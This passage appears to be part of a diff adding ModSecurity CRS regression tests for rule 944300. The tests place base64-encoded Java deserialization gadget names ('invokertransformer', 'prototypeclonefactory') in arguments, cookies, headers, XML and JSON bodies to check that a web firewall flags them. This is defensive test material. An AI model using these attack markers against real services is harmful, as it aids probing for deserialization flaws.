aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-214 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-220 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-235 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 